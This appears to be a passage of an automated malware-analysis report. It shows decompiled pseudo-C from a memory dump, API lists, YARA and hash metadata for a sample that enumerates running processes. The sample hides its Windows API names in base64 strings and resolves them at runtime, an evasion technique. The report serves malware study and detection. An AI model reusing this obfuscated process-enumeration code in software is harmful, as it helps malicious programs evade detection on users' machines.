                                                                                                                                                                                              				_v604 = 0;
                                                                                                                                                                                              				_v596 = 0;
                                                                                                                                                                                              				_v600 = 0;
                                                                                                                                                                                              				_v592 = 0;
                                                                                                                                                                                              				_v588 = 0;
                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                              				_v24 = 0;
                                                                                                                                                                                              				_v16 = _t110;
                                                                                                                                                                                              				 *[fs:eax] = _t249;
                                                                                                                                                                                              				E00406984("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
                                                                                                                                                                                              				_t115 = E00403990(_v588);
                                                                                                                                                                                              				_t194 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t115);
                                                                                                                                                                                              				E00406984("UHJvY2VzczMyRmlyc3RX", _t194,  &_v592, __edi, __esi);
                                                                                                                                                                                              				_t121 = E00403990(_v592);
                                                                                                                                                                                              				_t237 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t121);
                                                                                                                                                                                              				E00406984("UHJvY2VzczMyTmV4dFc=", _t194,  &_v596, _t237, __esi);
                                                                                                                                                                                              				_t127 = E00403990(_v596);
                                                                                                                                                                                              				E00406984("a2VybmVsMzIuZGxs", _t194,  &_v600, _t237, _t240);
                                                                                                                                                                                              				_t241 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t127);
                                                                                                                                                                                              				E004034E4(_v16);
                                                                                                                                                                                              				_t195 =  *_t194(2, 0,  *[fs:eax], 0x416eca, _t248, __edi, __esi, __ebx, _t246);
                                                                                                                                                                                              				if(_t195 != 0xffffffff) {
                                                                                                                                                                                              					_v584 = 0x22c;
                                                                                                                                                                                              					_push( &_v584);
                                                                                                                                                                                              					_push(_t195);
                                                                                                                                                                                              					if( *_t237() != 0) {
                                                                                                                                                                                              						do {
                                                                                                                                                                                              							_push(E004045EC(_v8) + 1);
                                                                                                                                                                                              							E004047A8();
                                                                                                                                                                                              							_t185 = E004045EC(_v8);
                                                                                                                                                                                              							_t245 =  &_v584;
                                                                                                                                                                                              							memcpy(_v8 + _t185 * 0x8b * 4 - 0x22c, _t245, 0x8b << 2);
                                                                                                                                                                                              							_t249 = _t249 + 0x10;
                                                                                                                                                                                              							_t237 = _t245 + 0x116;
                                                                                                                                                                                              							_t241 = _t241;
                                                                                                                                                                                              							 *((intOrPtr*)(_v8 + E004045EC(_v8) * 0x8b * 4 - 0x20c)) = 0;
                                                                                                                                                                                              							_push( &_v584);
                                                                                                                                                                                              							_push(_t195);
                                                                                                                                                                                              						} while ( *_t241() != 0);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t176 =  *0x41b57c; // 0x41c690
                                                                                                                                                                                              					 *((intOrPtr*)( *_t176))(_t195);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t139 = E004045EC(_v8) - 1;
                                                                                                                                                                                              				if(_t139 >= 0) {
                                                                                                                                                                                              					_v28 = _t139 + 1;
                                                                                                                                                                                              					_t197 = 0;
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						_v17 = 1;
                                                                                                                                                                                              						_t171 = E004045EC(_v8) - 1;
                                                                                                                                                                                              						if(_t171 >= 0) {
                                                                                                                                                                                              							_t173 = _t171 + 1;
                                                                                                                                                                                              							_t231 = 0;
                                                                                                                                                                                              							do {
                                                                                                                                                                                              								_t43 = _t197 * 0x8b * 4; // 0x0
                                                                                                                                                                                              								_t244 = _t231 * 0x8b;
                                                                                                                                                                                              								_t237 = _v8;
                                                                                                                                                                                              								_t47 = _t244 * 4; // 0x1ffff
                                                                                                                                                                                              								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
                                                                                                                                                                                              									_v17 = 0;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t231 = _t231 + 1;
                                                                                                                                                                                              								_t173 = _t173 - 1;
                                                                                                                                                                                              							} while (_t173 != 0);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t172 = _t197 * 0x8b;
                                                                                                                                                                                              						_t52 = _t172 * 4; // 0x0
                                                                                                                                                                                              						_t56 = _t172 * 4; // 0x1ffff
                                                                                                                                                                                              						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
                                                                                                                                                                                              							_v17 = 1;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_v17 == 1) {
                                                                                                                                                                                              							 *((intOrPtr*)(_v8 + 0x20 + _t172 * 4)) = 1;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t197 = _t197 + 1;
                                                                                                                                                                                              						_t64 =  &_v28;
                                                                                                                                                                                              						 *_t64 = _v28 - 1;
                                                                                                                                                                                              					} while ( *_t64 != 0);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_v12 = GetCurrentProcessId();
                                                                                                                                                                                              				_t143 = E004045EC(_v8) - 1;
                                                                                                                                                                                              				if(_t143 >= 0) {
                                                                                                                                                                                              					_v28 = _t143 + 1;
                                                                                                                                                                                              					_t196 = 0;
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						_t242 = _t196 * 0x8b;
                                                                                                                                                                                              						if( *((intOrPtr*)(_v8 + 0x20 + _t242 * 4)) == 1) {
                                                                                                                                                                                              							_t75 = _t242 * 4; // 0x1ffff
                                                                                                                                                                                              							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) {
                                                                                                                                                                                              								_push(_v24);
                                                                                                                                                                                              								_t90 = _t242 * 4; // 0x0
                                                                                                                                                                                              								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24);
                                                                                                                                                                                              								_push(_v608);
                                                                                                                                                                                              								_push(E00416F84);
                                                                                                                                                                                              								E00403850();
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_push(_v24);
                                                                                                                                                                                              								_t82 = _t242 * 4; // 0x0
                                                                                                                                                                                              								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
                                                                                                                                                                                              								_push(_v604);
                                                                                                                                                                                              								_push(0x416f78);
                                                                                                                                                                                              								_push(E00416F84);
                                                                                                                                                                                              								E00403850();
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t96 = _t196 * 0x8b * 4; // 0x1ffff
                                                                                                                                                                                              							E004169F0( *((intOrPtr*)(_v8 + _t96 + 8)), _t196,  &_v612, 1, _t237, _t242, _t247);
                                                                                                                                                                                              							E00403798( &_v24, _v612);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						E00403538(_v16, _v24);
                                                                                                                                                                                              						_t196 = _t196 + 1;
                                                                                                                                                                                              						_t103 =  &_v28;
                                                                                                                                                                                              						 *_t103 = _v28 - 1;
                                                                                                                                                                                              					} while ( *_t103 != 0);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t216);
                                                                                                                                                                                              				 *[fs:eax] = _t216;
                                                                                                                                                                                              				_push(E00416ED1);
                                                                                                                                                                                              				E00403508( &_v612, 7);
                                                                                                                                                                                              				E004034E4( &_v24);
                                                                                                                                                                                              				_t218 =  *0x4169c8; // 0x4169cc
                                                                                                                                                                                              				return E004047B4( &_v8, _t218);
                                                                                                                                                                                              			}











































                                                                                                                                                                                              0x00416d50
                                                                                                                                                                                              0x00416d52
                                                                                                                                                                                              0x00416d53
                                                                                                                                                                                              0x00416d55
                                                                                                                                                                                              0x00416d5e
                                                                                                                                                                                              0x00416d62
                                                                                                                                                                                              0x00416d68
                                                                                                                                                                                              0x00416d6b
                                                                                                                                                                                              0x00416d6f
                                                                                                                                                                                              0x00416d71
                                                                                                                                                                                              0x00416d71
                                                                                                                                                                                              0x00416d75
                                                                                                                                                                                              0x00416d76
                                                                                                                                                                                              0x00416d76
                                                                                                                                                                                              0x00416d55
                                                                                                                                                                                              0x00416d79
                                                                                                                                                                                              0x00416d82
                                                                                                                                                                                              0x00416d89
                                                                                                                                                                                              0x00416d8d
                                                                                                                                                                                              0x00416d8f
                                                                                                                                                                                              0x00416d8f
                                                                                                                                                                                              0x00416d97
                                                                                                                                                                                              0x00416d9c
                                                                                                                                                                                              0x00416d9c
                                                                                                                                                                                              0x00416da4
                                                                                                                                                                                              0x00416da5
                                                                                                                                                                                              0x00416da5
                                                                                                                                                                                              0x00416da5
                                                                                                                                                                                              0x00416d41
                                                                                                                                                                                              0x00416daf
                                                                                                                                                                                              0x00416dba
                                                                                                                                                                                              0x00416dbd
                                                                                                                                                                                              0x00416dc4
                                                                                                                                                                                              0x00416dc7
                                                                                                                                                                                              0x00416dc9
                                                                                                                                                                                              0x00416dc9
                                                                                                                                                                                              0x00416dd7
                                                                                                                                                                                              0x00416de0
                                                                                                                                                                                              0x00416de7
                                                                                                                                                                                              0x00416e22
                                                                                                                                                                                              0x00416e2e
                                                                                                                                                                                              0x00416e37
                                                                                                                                                                                              0x00416e3c
                                                                                                                                                                                              0x00416e42
                                                                                                                                                                                              0x00416e4f
                                                                                                                                                                                              0x00416de9
                                                                                                                                                                                              0x00416de9
                                                                                                                                                                                              0x00416df5
                                                                                                                                                                                              0x00416dfe
                                                                                                                                                                                              0x00416e03
                                                                                                                                                                                              0x00416e09
                                                                                                                                                                                              0x00416e0e
                                                                                                                                                                                              0x00416e1b
                                                                                                                                                                                              0x00416e1b
                                                                                                                                                                                              0x00416e5e
                                                                                                                                                                                              0x00416e6d
                                                                                                                                                                                              0x00416e7c
                                                                                                                                                                                              0x00416e7c
                                                                                                                                                                                              0x00416e87
                                                                                                                                                                                              0x00416e8c
                                                                                                                                                                                              0x00416e8d
                                                                                                                                                                                              0x00416e8d
                                                                                                                                                                                              0x00416e8d
                                                                                                                                                                                              0x00416dc9
                                                                                                                                                                                              0x00416e98
                                                                                                                                                                                              0x00416e9b
                                                                                                                                                                                              0x00416e9e
                                                                                                                                                                                              0x00416eae
                                                                                                                                                                                              0x00416eb6
                                                                                                                                                                                              0x00416ebe
                                                                                                                                                                                              0x00416ec9

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc$CurrentProcess
                                                                                                                                                                                              • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                                                                                                                                                                                              • API String ID: 3877065590-4127804628
                                                                                                                                                                                              • Opcode ID: 875a9f34e7222272479a6dad8a5508aed50dcbee07cd349c5d72faaa483ea699
                                                                                                                                                                                              • Instruction ID: f3c24ddc2a443a78fd4165323e7ca93df30f075cb4f00a4e444516d0c24f858d
                                                                                                                                                                                              • Opcode Fuzzy Hash: 875a9f34e7222272479a6dad8a5508aed50dcbee07cd349c5d72faaa483ea699
                                                                                                                                                                                              • Instruction Fuzzy Hash: FB917570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 71%
                                                                                                                                                                                              			E00416B90(signed int __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				long _v12;
                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                              				char _v17;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v584;
                                                                                                                                                                                              				char _v588;
                                                                                                                                                                                              				char _v592;
                                                                                                                                                                                              				char _v596;
                                                                                                                                                                                              				char _v600;
                                                                                                                                                                                              				char _v604;
                                                                                                                                                                                              				char _v608;
                                                                                                                                                                                              				char _v612;
                                                                                                                                                                                              				signed int _t109;
                                                                                                                                                                                              				CHAR* _t114;
                                                                                                                                                                                              				CHAR* _t120;
                                                                                                                                                                                              				CHAR* _t126;
                                                                                                                                                                                              				void* _t138;
                                                                                                                                                                                              				void* _t142;
                                                                                                                                                                                              				void* _t170;
                                                                                                                                                                                              				signed int _t171;
                                                                                                                                                                                              				void* _t172;
                                                                                                                                                                                              				intOrPtr* _t175;
                                                                                                                                                                                              				signed int _t184;
                                                                                                                                                                                              				intOrPtr* _t193;
                                                                                                                                                                                              				void* _t194;
                                                                                                                                                                                              				signed int _t195;
                                                                                                                                                                                              				signed int _t196;
                                                                                                                                                                                              				intOrPtr _t215;
                                                                                                                                                                                              				intOrPtr _t217;
                                                                                                                                                                                              				signed int _t230;
                                                                                                                                                                                              				intOrPtr* _t240;
                                                                                                                                                                                              				signed int _t241;
                                                                                                                                                                                              				signed int _t243;
                                                                                                                                                                                              				void* _t244;
                                                                                                                                                                                              				void* _t245;
                                                                                                                                                                                              				void* _t247;
                                                                                                                                                                                              				intOrPtr _t248;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t239 = __esi;
                                                                                                                                                                                              				_t109 = __eax | 0x5500000a;
                                                                                                                                                                                              				_t246 = _t247;
                                                                                                                                                                                              				_t248 = _t247 + 0xfffffda0;
                                                                                                                                                                                              				_v612 = 0;
                                                                                                                                                                                              				_v608 = 0;
                                                                                                                                                                                              				_v604 = 0;
                                                                                                                                                                                              				_v596 = 0;
                                                                                                                                                                                              				_v600 = 0;
                                                                                                                                                                                              				_v592 = 0;
                                                                                                                                                                                              				_v588 = 0;
                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                              				_v24 = 0;
                                                                                                                                                                                              				_v16 = _t109;
                                                                                                                                                                                              				 *[fs:eax] = _t248;
                                                                                                                                                                                              				E00406984("Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90", __ebx,  &_v588, __edi, __esi);
                                                                                                                                                                                              				_t114 = E00403990(_v588);
                                                                                                                                                                                              				_t193 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t114);
                                                                                                                                                                                              				E00406984("UHJvY2VzczMyRmlyc3RX", _t193,  &_v592, __edi, __esi);
                                                                                                                                                                                              				_t120 = E00403990(_v592);
                                                                                                                                                                                              				_t236 = GetProcAddress(LoadLibraryA("kernel32.dll"), _t120);
                                                                                                                                                                                              				E00406984("UHJvY2VzczMyTmV4dFc=", _t193,  &_v596, _t236, __esi);
                                                                                                                                                                                              				_t126 = E00403990(_v596);
                                                                                                                                                                                              				E00406984("a2VybmVsMzIuZGxs", _t193,  &_v600, _t236, _t239);
                                                                                                                                                                                              				_t240 = GetProcAddress(LoadLibraryA(E00403990(_v600)), _t126);
                                                                                                                                                                                              				E004034E4(_v16);
                                                                                                                                                                                              				_t194 =  *_t193(2, 0,  *[fs:eax], 0x416eca, _t247, __edi, __esi, __ebx, _t245);
                                                                                                                                                                                              				if(_t194 != 0xffffffff) {
                                                                                                                                                                                              					_v584 = 0x22c;
                                                                                                                                                                                              					_push( &_v584);
                                                                                                                                                                                              					_push(_t194);
                                                                                                                                                                                              					if( *_t236() != 0) {
                                                                                                                                                                                              						do {
                                                                                                                                                                                              							_push(E004045EC(_v8) + 1);
                                                                                                                                                                                              							E004047A8();
                                                                                                                                                                                              							_t184 = E004045EC(_v8);
                                                                                                                                                                                              							_t244 =  &_v584;
                                                                                                                                                                                              							memcpy(_v8 + _t184 * 0x8b * 4 - 0x22c, _t244, 0x8b << 2);
                                                                                                                                                                                              							_t248 = _t248 + 0x10;
                                                                                                                                                                                              							_t236 = _t244 + 0x116;
                                                                                                                                                                                              							_t240 = _t240;
                                                                                                                                                                                              							 *((intOrPtr*)(_v8 + E004045EC(_v8) * 0x8b * 4 - 0x20c)) = 0;
                                                                                                                                                                                              							_push( &_v584);
                                                                                                                                                                                              							_push(_t194);
                                                                                                                                                                                              						} while ( *_t240() != 0);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t175 =  *0x41b57c; // 0x41c690
                                                                                                                                                                                              					 *((intOrPtr*)( *_t175))(_t194);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t138 = E004045EC(_v8) - 1;
                                                                                                                                                                                              				if(_t138 >= 0) {
                                                                                                                                                                                              					_v28 = _t138 + 1;
                                                                                                                                                                                              					_t196 = 0;
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						_v17 = 1;
                                                                                                                                                                                              						_t170 = E004045EC(_v8) - 1;
                                                                                                                                                                                              						if(_t170 >= 0) {
                                                                                                                                                                                              							_t172 = _t170 + 1;
                                                                                                                                                                                              							_t230 = 0;
                                                                                                                                                                                              							do {
                                                                                                                                                                                              								_t43 = _t196 * 0x8b * 4; // 0x0
                                                                                                                                                                                              								_t243 = _t230 * 0x8b;
                                                                                                                                                                                              								_t236 = _v8;
                                                                                                                                                                                              								_t47 = _t243 * 4; // 0x1ffff
                                                                                                                                                                                              								if( *((intOrPtr*)(_v8 + _t43 + 0x18)) ==  *((intOrPtr*)(_v8 + _t47 + 8))) {
                                                                                                                                                                                              									_v17 = 0;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t230 = _t230 + 1;
                                                                                                                                                                                              								_t172 = _t172 - 1;
                                                                                                                                                                                              							} while (_t172 != 0);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t171 = _t196 * 0x8b;
                                                                                                                                                                                              						_t52 = _t171 * 4; // 0x0
                                                                                                                                                                                              						_t56 = _t171 * 4; // 0x1ffff
                                                                                                                                                                                              						if( *((intOrPtr*)(_v8 + _t52 + 0x18)) ==  *((intOrPtr*)(_v8 + _t56 + 8))) {
                                                                                                                                                                                              							_v17 = 1;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_v17 == 1) {
                                                                                                                                                                                              							 *((intOrPtr*)(_v8 + 0x20 + _t171 * 4)) = 1;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t196 = _t196 + 1;
                                                                                                                                                                                              						_t64 =  &_v28;
                                                                                                                                                                                              						 *_t64 = _v28 - 1;
                                                                                                                                                                                              					} while ( *_t64 != 0);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_v12 = GetCurrentProcessId();
                                                                                                                                                                                              				_t142 = E004045EC(_v8) - 1;
                                                                                                                                                                                              				if(_t142 >= 0) {
                                                                                                                                                                                              					_v28 = _t142 + 1;
                                                                                                                                                                                              					_t195 = 0;
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						_t241 = _t195 * 0x8b;
                                                                                                                                                                                              						if( *((intOrPtr*)(_v8 + 0x20 + _t241 * 4)) == 1) {
                                                                                                                                                                                              							_t75 = _t241 * 4; // 0x1ffff
                                                                                                                                                                                              							if( *((intOrPtr*)(_v8 + _t75 + 8)) != _v12) {
                                                                                                                                                                                              								_push(_v24);
                                                                                                                                                                                              								_t90 = _t241 * 4; // 0x0
                                                                                                                                                                                              								E00403760( &_v608, 0x104, _v8 + _t90 + 0x24);
                                                                                                                                                                                              								_push(_v608);
                                                                                                                                                                                              								_push(E00416F84);
                                                                                                                                                                                              								E00403850();
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_push(_v24);
                                                                                                                                                                                              								_t82 = _t241 * 4; // 0x0
                                                                                                                                                                                              								E00403760( &_v604, 0x104, _v8 + _t82 + 0x24);
                                                                                                                                                                                              								_push(_v604);
                                                                                                                                                                                              								_push(0x416f78);
                                                                                                                                                                                              								_push(E00416F84);
                                                                                                                                                                                              								E00403850();
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_t96 = _t195 * 0x8b * 4; // 0x1ffff
                                                                                                                                                                                              							E004169F0( *((intOrPtr*)(_v8 + _t96 + 8)), _t195,  &_v612, 1, _t236, _t241, _t246);
                                                                                                                                                                                              							E00403798( &_v24, _v612);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						E00403538(_v16, _v24);
                                                                                                                                                                                              						_t195 = _t195 + 1;
                                                                                                                                                                                              						_t103 =  &_v28;
                                                                                                                                                                                              						 *_t103 = _v28 - 1;
                                                                                                                                                                                              					} while ( *_t103 != 0);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t215);
                                                                                                                                                                                              				 *[fs:eax] = _t215;
                                                                                                                                                                                              				_push(E00416ED1);
                                                                                                                                                                                              				E00403508( &_v612, 7);
                                                                                                                                                                                              				E004034E4( &_v24);
                                                                                                                                                                                              				_t217 =  *0x4169c8; // 0x4169cc
                                                                                                                                                                                              				return E004047B4( &_v8, _t217);
                                                                                                                                                                                              			}

                                                                                                                                                                                              0x00416cee
                                                                                                                                                                                              0x00416cf9
                                                                                                                                                                                              0x00416cf9
                                                                                                                                                                                              0x00416cf9
                                                                                                                                                                                              0x00416cfb
                                                                                                                                                                                              0x00416d0f
                                                                                                                                                                                              0x00416d1c
                                                                                                                                                                                              0x00416d1d
                                                                                                                                                                                              0x00416d20
                                                                                                                                                                                              0x00416cb5
                                                                                                                                                                                              0x00416d25
                                                                                                                                                                                              0x00416d2c
                                                                                                                                                                                              0x00416d2c
                                                                                                                                                                                              0x00416d36
                                                                                                                                                                                              0x00416d39
                                                                                                                                                                                              0x00416d3c
                                                                                                                                                                                              0x00416d3f
                                                                                                                                                                                              0x00416d41
                                                                                                                                                                                              0x00416d41
                                                                                                                                                                                              0x00416d4d
                                                                                                                                                                                              0x00416d50
                                                                                                                                                                                              0x00416d52
                                                                                                                                                                                              0x00416d53
                                                                                                                                                                                              0x00416d55
                                                                                                                                                                                              0x00416d5e
                                                                                                                                                                                              0x00416d62
                                                                                                                                                                                              0x00416d68
                                                                                                                                                                                              0x00416d6b
                                                                                                                                                                                              0x00416d6f
                                                                                                                                                                                              0x00416d71
                                                                                                                                                                                              0x00416d71
                                                                                                                                                                                              0x00416d75
                                                                                                                                                                                              0x00416d76
                                                                                                                                                                                              0x00416d76
                                                                                                                                                                                              0x00416d55
                                                                                                                                                                                              0x00416d79
                                                                                                                                                                                              0x00416d82
                                                                                                                                                                                              0x00416d89
                                                                                                                                                                                              0x00416d8d
                                                                                                                                                                                              0x00416d8f
                                                                                                                                                                                              0x00416d8f
                                                                                                                                                                                              0x00416d97
                                                                                                                                                                                              0x00416d9c
                                                                                                                                                                                              0x00416d9c
                                                                                                                                                                                              0x00416da4
                                                                                                                                                                                              0x00416da5
                                                                                                                                                                                              0x00416da5
                                                                                                                                                                                              0x00416da5
                                                                                                                                                                                              0x00416d41
                                                                                                                                                                                              0x00416daf
                                                                                                                                                                                              0x00416dba
                                                                                                                                                                                              0x00416dbd
                                                                                                                                                                                              0x00416dc4
                                                                                                                                                                                              0x00416dc7
                                                                                                                                                                                              0x00416dc9
                                                                                                                                                                                              0x00416dc9
                                                                                                                                                                                              0x00416dd7
                                                                                                                                                                                              0x00416de0
                                                                                                                                                                                              0x00416de7
                                                                                                                                                                                              0x00416e22
                                                                                                                                                                                              0x00416e2e
                                                                                                                                                                                              0x00416e37
                                                                                                                                                                                              0x00416e3c
                                                                                                                                                                                              0x00416e42
                                                                                                                                                                                              0x00416e4f
                                                                                                                                                                                              0x00416de9
                                                                                                                                                                                              0x00416de9
                                                                                                                                                                                              0x00416df5
                                                                                                                                                                                              0x00416dfe
                                                                                                                                                                                              0x00416e03
                                                                                                                                                                                              0x00416e09
                                                                                                                                                                                              0x00416e0e
                                                                                                                                                                                              0x00416e1b
                                                                                                                                                                                              0x00416e1b
                                                                                                                                                                                              0x00416e5e
                                                                                                                                                                                              0x00416e6d
                                                                                                                                                                                              0x00416e7c
                                                                                                                                                                                              0x00416e7c
                                                                                                                                                                                              0x00416e87
                                                                                                                                                                                              0x00416e8c
                                                                                                                                                                                              0x00416e8d
                                                                                                                                                                                              0x00416e8d
                                                                                                                                                                                              0x00416e8d
                                                                                                                                                                                              0x00416dc9
                                                                                                                                                                                              0x00416e98
                                                                                                                                                                                              0x00416e9b
                                                                                                                                                                                              0x00416e9e
                                                                                                                                                                                              0x00416eae
                                                                                                                                                                                              0x00416eb6
                                                                                                                                                                                              0x00416ebe
                                                                                                                                                                                              0x00416ec9

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,,?,Zone: ,?,004175A8), ref: 00416DAA
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProc$CurrentProcess
                                                                                                                                                                                              • String ID: Q3JlYXRlVG9vbGhlbHAzMlNuYXBzaG90$UHJvY2VzczMyRmlyc3RX$UHJvY2VzczMyTmV4dFc=$a2VybmVsMzIuZGxs$kernel32.dll
                                                                                                                                                                                              • API String ID: 3877065590-4127804628
                                                                                                                                                                                              • Opcode ID: 0f8ae1aecedffc538cedfaaf6d2ef413c8cc501e5b20150028d7674d04a881bf
                                                                                                                                                                                              • Instruction ID: fd76d8ed353255a1278cd755ee3df483ef4fe920b1e5afc451e9d1c12470fbd9
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f8ae1aecedffc538cedfaaf6d2ef413c8cc501e5b20150028d7674d04a881bf
                                                                                                                                                                                              • Instruction Fuzzy Hash: B2818570A006099BCB10EF69C985ADEB7B9FF84304F1181BAE509B7291D739DF858F58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                                                              			E00415F30(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                              				char _v1009;
                                                                                                                                                                                              				char _v1016;
                                                                                                                                                                                              				intOrPtr _v1020;
                                                                                                                                                                                              				char _v1024;
                                                                                                                                                                                              				char _v1028;
                                                                                                                                                                                              				char _v1032;
                                                                                                                                                                                              				char _v1036;
                                                                                                                                                                                              				char _v1040;
                                                                                                                                                                                              				char _v1044;
                                                                                                                                                                                              				char _v1048;
                                                                                                                                                                                              				char _v1052;
                                                                                                                                                                                              				char _v1056;
                                                                                                                                                                                              				char _v1060;
                                                                                                                                                                                              				char _v1064;
                                                                                                                                                                                              				char _v1068;
                                                                                                                                                                                              				char _v1072;
                                                                                                                                                                                              				char _v1076;
                                                                                                                                                                                              				intOrPtr _v1080;
                                                                                                                                                                                              				char _v1084;
                                                                                                                                                                                              				char _v1088;
                                                                                                                                                                                              				char _v1092;
                                                                                                                                                                                              				char _v1096;
                                                                                                                                                                                              				char _v1100;
                                                                                                                                                                                              				char _v1104;
                                                                                                                                                                                              				char _v1108;
                                                                                                                                                                                              				char _v1112;
                                                                                                                                                                                              				char _v1116;
                                                                                                                                                                                              				char _v1120;
                                                                                                                                                                                              				char _v1124;
                                                                                                                                                                                              				char _v1128;
                                                                                                                                                                                              				char _v1132;
                                                                                                                                                                                              				char _v1136;
                                                                                                                                                                                              				char _v1140;
                                                                                                                                                                                              				char _v1144;
                                                                                                                                                                                              				char _v1148;
                                                                                                                                                                                              				void* _t123;
                                                                                                                                                                                              				void* _t144;
                                                                                                                                                                                              				void* _t178;
                                                                                                                                                                                              				void* _t199;
                                                                                                                                                                                              				intOrPtr* _t262;
                                                                                                                                                                                              				void* _t263;
                                                                                                                                                                                              				void* _t265;
                                                                                                                                                                                              				void* _t267;
                                                                                                                                                                                              				void* _t269;
                                                                                                                                                                                              				void* _t271;
                                                                                                                                                                                              				intOrPtr _t318;
                                                                                                                                                                                              				char* _t329;
                                                                                                                                                                                              				int _t331;
                                                                                                                                                                                              				int _t332;
                                                                                                                                                                                              				intOrPtr _t334;
                                                                                                                                                                                              				intOrPtr _t335;
                                                                                                                                                                                              
